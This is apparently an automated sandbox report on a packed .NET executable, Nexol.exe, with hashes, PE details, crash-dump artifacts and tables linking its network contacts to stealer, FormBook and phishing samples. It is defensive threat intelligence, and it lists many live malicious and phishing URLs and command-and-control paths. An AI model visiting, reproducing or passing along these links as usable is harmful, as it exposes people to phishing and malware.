Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
18:59:24	API Interceptor	8x Sleep call for process: Nexol.exe modified
18:59:29	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.16.1	J8bamK92a3.exe	Get hash	malicious	FormBook	Browse	www.play-vanguard-nirvana.xyz/egs9/?9r=2m/uVQwqKH2EIWlawszTKzvIepBfVH/HI19qzylF05nDLsWuBLn1pb4DiFDKEzYOkwPMwL8bVA==&vZR=H2MpG0p
	0t7MXNEfCg.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/2dxw/
	g1V10ssekg.exe	Get hash	malicious	FormBook	Browse	www.sigaque.today/n61y/?UPV=BOlfS7N9ZWkGRIMRgNC6B6+WUTyM673eSjZAzliNIDKZHnAeT7/5dfTbZtimq+dx8K4CQjPcymznAMXPWSrBBYPYz0JSQDMkWzhvpNbFnW2/OcjAWw==&YrV=FlsDgRMx
	0IrTeguWM7.exe	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/ftbq/
	Shipping Document.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/6m32/
	Payment Record.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sccc/five/fre.php
	Invoice Remittance ref27022558.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/a669/
	ujXpculHYDYhc6i.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sss2/five/fre.php
	368c6e62-b031-5b65-fd43-e7a610184138.eml	Get hash	malicious	HTMLPhisher	Browse	ce60771026585.oakdiiocese.org/p/298?session=770558a25b5d1fcbb8d81f113631d430f5b8d022cdc6d97cf6b16a412a3be9e6
	http://orico-rapaciid.xqyrr.cn/eorico/login/	Get hash	malicious	Unknown	Browse	orico-rapaciid.xqyrr.cn/favicon.ico
23.210.122.61	wanscam software ocx setup download.exe	Get hash	malicious	LummaC Stealer	Browse
	Pirate.exe	Get hash	malicious	Vidar	Browse
	http://steamcommunity-cash.com/gift/id=572931441	Get hash	malicious	Unknown	Browse
	https://steanmcommurnlty.com/gift/762726	Get hash	malicious	Unknown	Browse
	qNXDfsU2K7.exe	Get hash	malicious	Unknown	Browse
	H5S6rm5oQ9.exe	Get hash	malicious	Unknown	Browse
	https://steamcommunittyy.com/prefer/HSVC0017/redirect/812/0017	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC	Browse
23.197.127.21	http://steamcomunity.aiq.ru/	Get hash	malicious	Unknown	Browse	steamcommunity.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	biyhoksefdad.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	YuQuLoader.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	Aura.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	publicpublicpublic.xll.ps1	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	http://support.ec2-amazonaws.net?incident=RofwZT0	Get hash	malicious	Unknown	Browse	51.103.246.168
	Malware.zip	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	External2.4.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	Superority.exe1.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	ResPencil.5.6.1.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
steamcommunity.com	dawothjkjad.exe	Get hash	malicious	LummaC Stealer	Browse	23.197.127.21
	nogtpjadthaw.exe	Get hash	malicious	LummaC Stealer	Browse	23.197.127.21
	jthkadktjhja.exe	Get hash	malicious	LummaC Stealer	Browse	23.197.127.21
	mvtijadjtrhawd.exe	Get hash	malicious	LummaC Stealer	Browse	23.197.127.21
	dawothjkjad.exe	Get hash	malicious	LummaC Stealer	Browse	104.73.234.102
	jthkadktjhja.exe	Get hash	malicious	LummaC Stealer	Browse	23.197.127.21
	biyhoksefdad.exe	Get hash	malicious	LummaC Stealer	Browse	104.73.234.102
	SecuriteInfo.com.Win32.MalwareX-gen.1567.5483.exe	Get hash	malicious	LummaC Stealer	Browse	104.73.234.102
	SecuriteInfo.com.Trojan.PWS.Lumma.1819.32357.4325.exe	Get hash	malicious	LummaC Stealer	Browse	23.197.127.21
	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	92.122.104.90

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	#U0420#U0430#U0442#U043a#U0430.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	https://nr.chadwickbarros.cl/	Get hash	malicious	Unknown	Browse	149.154.167.220
	R9rwNLVzpr.exe	Get hash	malicious	Phemedrone Stealer	Browse	149.154.167.220
	nobtpajdjthawd.exe	Get hash	malicious	Keyzetsu Clipper	Browse	149.154.167.220
	biyhoksefdad.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	YuQuLoader.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	KoaguarLoader.exe	Get hash	malicious	Salat Stealer, XWorm	Browse	149.154.167.220
	Aura.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	Solara Executor.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	RFQ.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220
CLOUDFLARENETUS	https://www.canva.com/design/DAGhb8U4chg/3aIOcMOYfXFvNu6pkMJtcA/view?utm_content=DAGhb8U4chg&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=he54ee766c5	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	188.114.97.3
	http://def.ball-strike-up.shop/	Get hash	malicious	Unknown	Browse	104.21.25.219
	pCFcu1ilGh	Get hash	malicious	Unknown	Browse	104.21.59.228
	https://aid97400.lautre.net/spip.php?action=cookie&url=https://gamma.app/docs/Incoming-PDF-Document-s6fqj764y4eavtn?mode=present#card-n5or5ilh0b5ihtz	Get hash	malicious	HTMLPhisher	Browse	104.18.11.200
	Xeno.exe	Get hash	malicious	Discord Rat	Browse	162.159.130.234
	https://rebrand.ly/1bbw71e	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Xeno.exe	Get hash	malicious	Discord Rat	Browse	162.159.135.234
	https://Mymanatee.allenebc.com/#cmVuZXNlLnJlbXlAbXltYW5hdGVlLm9yZw==	Get hash	malicious	Unknown	Browse	104.18.94.41
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://zatp6ncab.cc.rs6.net/tn.jsp?f=001cxnICqQ2JvPHh68sPy67JcA12wTozyZ6tUXkt2fZXwkdUYMtwupLT-S4xl9B8jrFTN2ypT6neP3NkCtT6T7jkLznqRZuYP8GDL9GeN2eBUzFDN-0RDFO77xH2Hs1dfopzmnxZo5nnmpQ5j86V7OAlkc5LTVsDC46&c=fACjGJy843O2qLhy_EDw1tXsObaS44Oax9jWi5hSnXgO6cOpWOdvvQ==&ch=uDRbqb-h-hxGIaPgl5mPd8lWnKQdGcMqD3sNOjiafZx2mj0NMDi8Mw==	Get hash	malicious	Unknown	Browse	172.67.142.245
AKAMAI-ASUS	https://aid97400.lautre.net/spip.php?action=cookie&url=https://gamma.app/docs/Incoming-PDF-Document-s6fqj764y4eavtn?mode=present#card-n5or5ilh0b5ihtz	Get hash	malicious	HTMLPhisher	Browse	2.16.202.120
	https://rebrand.ly/1bbw71e	Get hash	malicious	HTMLPhisher	Browse	92.123.12.139
	http://www.whbm.com:9001/	Get hash	malicious	Unknown	Browse	184.30.129.185
	http://a6691cd0-2aca-4f5d-b954-fae129580e64.ciamlogin.com	Get hash	malicious	Unknown	Browse	92.123.12.181
	https://site-xtxg5.powerappsportals.com/	Get hash	malicious	HTMLPhisher	Browse	92.123.12.181
	dawothjkjad.exe	Get hash	malicious	LummaC Stealer	Browse	104.73.234.102
	jthkadktjhja.exe	Get hash	malicious	LummaC Stealer	Browse	104.73.234.102
	biyhoksefdad.exe	Get hash	malicious	LummaC Stealer	Browse	104.73.234.102
	NEW__Review_202551087.svg	Get hash	malicious	HTMLPhisher	Browse	2.19.122.30
	https://27nu3f.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAXEVXYVKECWW5MI5X&Signature=r9esEdZ8wICuSDL4BgGdA42JzT4%3D&Expires=1741852338	Get hash	malicious	Unknown	Browse	23.56.162.204
AKAMAI-ASN1EU	https://rebrand.ly/1bbw71e	Get hash	malicious	HTMLPhisher	Browse	104.124.11.19
	https://zatp6ncab.cc.rs6.net/tn.jsp?f=001cxnICqQ2JvPHh68sPy67JcA12wTozyZ6tUXkt2fZXwkdUYMtwupLT-S4xl9B8jrFTN2ypT6neP3NkCtT6T7jkLznqRZuYP8GDL9GeN2eBUzFDN-0RDFO77xH2Hs1dfopzmnxZo5nnmpQ5j86V7OAlkc5LTVsDC46&c=fACjGJy843O2qLhy_EDw1tXsObaS44Oax9jWi5hSnXgO6cOpWOdvvQ==&ch=uDRbqb-h-hxGIaPgl5mPd8lWnKQdGcMqD3sNOjiafZx2mj0NMDi8Mw==	Get hash	malicious	Unknown	Browse	23.15.178.139
	SecureMessageatt.svg	Get hash	malicious	Phisher	Browse	2.19.96.57
	#U25baPlay_VM-NowATTT0003.html	Get hash	malicious	HTMLPhisher	Browse	95.101.182.112
	Play Voicemail Transcription. (387.KB).svg	Get hash	malicious	HTMLPhisher	Browse	2.16.100.176
	http://www.whbm.com:9001/	Get hash	malicious	Unknown	Browse	23.197.125.187
	https://start.scholarsapply.org/	Get hash	malicious	HTMLPhisher	Browse	72.247.154.153
	http://a6691cd0-2aca-4f5d-b954-fae129580e64.ciamlogin.com	Get hash	malicious	Unknown	Browse	88.221.110.82
	https://site-xtxg5.powerappsportals.com/	Get hash	malicious	HTMLPhisher	Browse	95.101.182.65
	dawothjkjad.exe	Get hash	malicious	LummaC Stealer	Browse	23.197.127.21

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Setup.exe	Get hash	malicious	Unknown	Browse	104.21.16.1 23.210.122.61 23.197.127.21 149.154.167.99
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.1 23.210.122.61 23.197.127.21 149.154.167.99
	Acgpfgd.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.1 23.210.122.61 23.197.127.21 149.154.167.99
	MyProfessionalResume_Updated.exe	Get hash	malicious	Unknown	Browse	104.21.16.1 23.210.122.61 23.197.127.21 149.154.167.99
	Set-up.exe	Get hash	malicious	GO Backdoor, LummaC Stealer	Browse	104.21.16.1 23.210.122.61 23.197.127.21 149.154.167.99
	expense-report.xlsx	Get hash	malicious	KnowBe4	Browse	104.21.16.1 23.210.122.61 23.197.127.21 149.154.167.99
	ScreenSync.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.1 23.210.122.61 23.197.127.21 149.154.167.99
	vktyhkakwdrg.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.1 23.210.122.61 23.197.127.21 149.154.167.99
	dawothjkjad.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.1 23.210.122.61 23.197.127.21 149.154.167.99
	nogtpjadthaw.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.1 23.210.122.61 23.197.127.21 149.154.167.99

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Nexol.exe_1129eabdc81cac1ca6b33410e6bea36a32e7d82e_cedd26c6_fe2cbf40-d1af-42e8-965e-1e239c3610de\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8576970066647667
Encrypted:	false
SSDEEP:	96:1+FesycCCsVgtojTOAqyS3QXIDcQlc6VcEdcw3l+BHUHZ0ownOgHkEwH3dEFYAKb:YdyxCDvA0LR30auSzuiFiZ24IO8j
MD5:	6AB6839D7871C043A04A4413EB2C5678
SHA1:	FD9952FFCA364972A995F55DCAC70F99D1655240
SHA-256:	4CBCA03EFB5B77BF677EDC4E9C80C7F7B398811A27E18233BD237F321313FC0B
SHA-512:	43AC36329225F899DED8080B480D9955E3454FB65178EF663E1554834426BEF8CB8673857FB53A6D675B15D52515B6DABE697DBC39AE20DFE0B6AD63DDFCB959
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.2.0.7.5.6.2.9.4.3.7.3.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.2.0.7.5.6.3.5.9.9.9.9.2.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.e.2.c.b.f.4.0.-.d.1.a.f.-.4.2.e.8.-.9.6.5.e.-.1.e.2.3.9.c.3.6.1.0.d.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.8.e.a.a.6.c.-.9.1.9.1.-.4.c.9.5.-.b.0.e.d.-.e.a.7.d.e.a.5.b.f.3.7.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.e.x.o.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.r.t.a.l.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.6.8.-.0.0.0.1.-.0.0.1.8.-.6.f.7.f.-.0.a.3.9.d.9.9.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.d.c.7.a.7.7.b.0.8.0.2.3.d.f.f.4.1.3.b.c.4.e.a.5.1.a.2.5.5.6.3.0.0.0.0.0.0.0.0.!.0.0.0.0.5.6.c.0.e.8.6.0.e.d.6.4.4.2.7.4.9.4.b.d.7.1.1.b.e.4.9.a.7.d.7.a.b.9.b.9.9.f.5.e.!.N.e.x.o.l.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER295A.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Mar 11 22:59:23 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	152455
Entropy (8bit):	3.7716384747203042
Encrypted:	false
SSDEEP:	1536:9QaDGAxAdtKgCDb/ItTbLuBojRtpN4uE2aOILTgVl:9rD52tseNh4uEqILTgVl
MD5:	EB3D422CD852C9AFFA3EBC8C68C50315
SHA1:	06192DA70797618354E0AF5DEEAB1C08EC836EFB
SHA-256:	251FF1AE192B9204FB3B7DA23B9E156728A4CE082B28646E3EF7AA6EF3CB9E07
SHA-512:	805C5B47C82B5595B4CBE63E2F0B0B533BD32F3268313ED2A4E4F76491281F26DF118001F3518CA57BC840FA3DF22AC99970C6EF9512BD9AE8415F156A3B938A
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......K..g....................................$................-..........`.......8...........T...........P...74......................................................................................................eJ..............GenuineIntel............T.......h...H..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A75.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8374
Entropy (8bit):	3.68670496760897
Encrypted:	false
SSDEEP:	192:R6l7wVeJZm6n66Y62SUvY9gmfKVJjprRN89b5Jsf6cTm:R6lXJo666YbSUA9gmfKVJ/q5ifs
MD5:	609244967ACA170EC2BDF5494F75D251
SHA1:	BA610B448310F92BD74AC5E6F44A3CF4128704A1
SHA-256:	AF2C8F65EBA8F4C8870A31F4F8F3EC9CABD5C40CD66D0D377FD078637FFB9B8C
SHA-512:	84E6D996A4D63047549234B104C053FC491EF57030ED2EEECE1828FA54F6F19E314D73B0F407DF8A8F9874B39887AD755254F30246A0E01AE59DDAF1150282D3
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.2.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AB4.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4725
Entropy (8bit):	4.436995888838209
Encrypted:	false
SSDEEP:	48:cvIwWl8zsaJg77aI9QrWpW8VYUrYm8M4J2dxPcf6F4w+q8vhdxPcfi22jb5SV5d:uIjfoI7ia7VqJ7fhwKGfipjb5Snd
MD5:	A7A4279BFCE7CB5E30A3A2BF91483306
SHA1:	F4B288FC5F53C97D3DB83EA925CE4EE3ABDB7A5A
SHA-256:	E068AB38CB319042D1306F441A0BFAEA750449FEC3A53A8721AD4B0D8A3B8716
SHA-512:	A75BDE24F199A2F40FAA85461C3142EA5BDBCB092F1C610C1B295D2D6B5EC3780E581DAC902EE149D947283AD25CB0CA1E147CC7D494F46445903969AB0FF7D8
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="756842" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.470238058130492
Encrypted:	false
SSDEEP:	6144:f+Xfpi67eLPU9skLmb0b4tWSPKaJG8nAgejZQqZaKWFIeC/F1cXldW1qaEGlS:GXD94tWlLZQqYgtWVsS
MD5:	4C8AA231F9EE1A787578566BF9181753
SHA1:	03574F299963AC57B4FEF549D56983711B4B09CC
SHA-256:	D85614FF48F4729902575254AD798540C4EA73B0F853E5FE13E5485D7BC25D5F
SHA-512:	B7C248103BB3677C753D023D827C55F4DF70507D27A78730F29AFAC5143EB113ECE6C94C16962C4EA72305F7C2B348BACB77D5AB3435FBB03B88813B4850CFAB
Malicious:	false
Reputation:	low
Preview:	regf:...:....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..7wK...............................................................................................................................................................................................................................................................................................................................................{@!C........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	4.152959350647198
Encrypted:	false
SSDEEP:	768:SjQDoFV4Nr0WFRs7iWgUf8LEl99Vd9l+9uPIEcfmsc7si:SjiFdQz8Ilv9l0utc
MD5:	45E4A244B6712E711ECBF7D092769A9D
SHA1:	4D39B271B694CE650A0EE7461740100F3EAE9783
SHA-256:	CA8DABFF3300B2D4F52239986CF6AD55D85FA2AB7451C5AF60D3128F49F57E09
SHA-512:	1F7F19931DE9F2AF3B255A28430E9012BF0D433C0FE2B064361B67B4DCDF5830C08127C269F129CDFD60F86CE64B5E2D06F1D0525B1C8E67E3E9C22336EB10BF
Malicious:	false
Reputation:	low
Preview:	regf9...9....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..7wK...............................................................................................................................................................................................................................................................................................................................................}@!CHvLE........9...........p.....r.r8w.e0............................. .......0..hbin.................\.Z............nk,..\.Z........ ...........h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........c...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.988896895218854
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Nexol.exe
File size:	374'272 bytes
MD5:	0316cd6308d80a13369226b1b4208c64
SHA1:	56c0e860ed64427494bd711be49a7d7ab9b99f5e
SHA256:	b5eddf91c06b738ade13165dfd3fb440e8a0c68b40ec64d000c07156717d5a37
SHA512:	5be19e6cc870c3a1f6c476a2af933e8bd28f9ac30540d875ce441c38b867c20b4dc332f01ddd2762dd6aedd92eb4a8733437c5f58d9cc59cabd1f7cd82254a1c
SSDEEP:	6144:UxJLQFbpIrNxZtvQ0KjxL8KwytUrTZPoXntBdCVRAU3pVUnNAfqp+h1tEgX7z5cJ:24bpIjZBQxxLZtUrTZPit+AU3pkNWqIO
TLSH:	D884233487A2435CD08EFB763ED38F9331C2415168B1B76C075A883DBBA75ADC972658
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q............"...0.."..........f;... ...`....@.. .......................@............`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x403b66
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xADFF511F [Mon Jul 3 22:20:15 2062 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
push es
js 00007F1230D0118Dh
or al, 24h
add eax, 15110704h
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
pop esp
jns 00001153h
jno 00007F1230D0123Ah
aam C8h
outsd
and eax, 4C604532h
jmp far 5164h : 62FDD060h
mov dword ptr [esi], ebx
xor byte ptr [ebx+7BBFA4B8h], ah
aam 4Ah
ret
jnbe 00007F1230D011F6h
add al, 3Dh
add byte ptr [eax], al
add byte ptr [eax], al
jns 00007F1230D01222h
lea edx, dword ptr [eax]
loope 00007F1230D011BBh
sti
jne 00007F1230D011D3h
or esp, dword ptr [ecx]
adc esi, ebp
cmpsd
in al, 03h
mov bh, A3h
cmpsb
and dword ptr [eax], esp
test esi, esp
cwde
push edx
jmp 00007F11DEFD52D1h
sub dword ptr [edx+325E6BADh], esp
adc dword ptr [ebx], esp
lodsd
rcl dword ptr [eax-35h], FFFFFFDCh
sub ah, byte ptr [ebx]
inc ebx
jnc 00007F1230D0120Bh
jbe 00007F1230D01237h
cmp dword ptr [ebp-00874B27h], esi
push eax
and ah, byte ptr [ecx+03FCEF36h]
hlt
xchg eax, edi
int3
scasb
add eax, A99A6234h
aam 6Fh
mov edx, 0A561172h
mov al, C7h
pop ds
cmp esp, ebx
fdivr qword ptr [edi]
or bl, byte ptr [ebp-5Eh]
shl al, FFFFFFBFh
mov eax, 926A3B5Eh
add byte ptr [ecx], 00000069h
pop eax
stosb

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3b14	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6000	0x59c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a80	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x20f8	0x2200	2336fc02d84ab7fe67bf872f8511b001	False	0.7184053308823529	data	6.597846647424806	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x6000	0x59c	0x600	88026805aec0496128e320c861c25c4f	False	0.41015625	data	4.0305393073644025	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8000	0xc	0x200	fe25fe59d6526d5530f0d4f3420107c5	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.CSS	0xa000	0x58800	0x58800	13690fab8c0a67363c3f7eb291577791	False	1.0003337967867232	data	7.999488793930054	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x6090	0x30c	data			0.4217948717948718
RT_MANIFEST	0x63ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
Comments
CompanyName
FileDescription	Portals
